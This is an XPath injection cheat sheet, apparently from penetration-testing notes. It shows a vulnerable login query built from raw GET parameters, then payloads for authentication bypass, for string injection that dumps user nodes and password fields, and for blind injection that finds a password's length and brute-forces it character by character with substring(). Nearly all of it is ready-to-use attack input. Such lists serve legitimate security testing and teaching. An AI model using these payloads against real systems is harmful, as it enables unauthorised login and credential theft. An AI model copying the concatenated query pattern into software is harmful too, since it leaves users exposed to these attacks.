Basic authentication bypass

# XPath login/password often works as follow # $xpath = "//user[user='" . $_GET['user'] . "' and pass='" . $_GET['pass'] . "']"; # You can make the 2 conds TRUE and log with the first user user=' or '1'='1&pass=' or '1'='1 # Log using a specific user //user[username='' or '1'='1' and password='truc'] ⇒ John' or '1'='1 # Bypass the password (because of the ‘=’) ' or username='John' or ''=' String XPath Injection # You can use following: to display all the following attributes after the node a')]/following::*[('1'='1 # You can inject in the contains() # Just bypass the first condition to get out of //user/username and then display the whole user content search=')] | //user/*[contains(*,' # You can just escape username to request password field search=Har')%20and%20contains(../password,'c search=Har') and starts-with(../password,'c Blind XPath Injection # Identify columns &userid=2 and password # The first thing is to retrieve the password length, through boolean expression # First is wrong OR user1 displayed if password is 10 long OR user2 displayed userid=22222 ] | //user[1][userid=1 and string-length(//user[2]/password)=10] | //user[userid=2 # Then you can start to bruteforce char userid=1 and substring(//user[1]/password,1,1)='p' # If quotes are filtered, you can use others XML objects to compare (limited dictionnary) # First is wrong OR user1 displayed if the user2's password first char = user1's username first char OR user2 displayed userid="22222 ] | //user[1][userid=1 and substring(//user[2]/password,1,1)=substring(//user[1]/username,1,1) ] | //user[userid=2